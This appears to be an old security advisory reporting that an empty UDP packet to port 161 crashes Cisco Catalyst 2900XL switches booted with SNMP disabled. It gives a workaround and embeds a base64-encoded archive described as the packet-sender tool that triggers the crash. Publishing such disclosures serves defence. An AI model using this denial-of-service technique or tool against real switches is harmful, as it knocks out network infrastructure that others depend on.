COMMAND

    Cisco

SYSTEMS AFFECTED

    Cisco Catalyst 2900XL

PROBLEM

    'bash' found  following.   It's possible  to crash  Cisco Catalyst
    2900XL with a empty UDP packet to port 161 when SNMP is  disabled.
    (Other switches also?)

    The  crash  only  occurs  when  the  switch  is  booted  with SNMP
    disabled.  Seems that SNMP is listening, even if SNMP is disabled.

    This has been  only tested with  Software Version 12.0(5.2)XU,  on
    WS-C2924C-XL-EN switch.

    A simple empty UDP packet sender included.

    ---
    Content-Type: application/octet-stream; name="c2900xl.tgz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="c2900xl.tgz"
    Content-MD5: hcN/nko5sDbgV+tia+iZfw==
    
    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
    
    -----

SOLUTION

    Enable SNMP, or enable SNMP and then disable SNMP.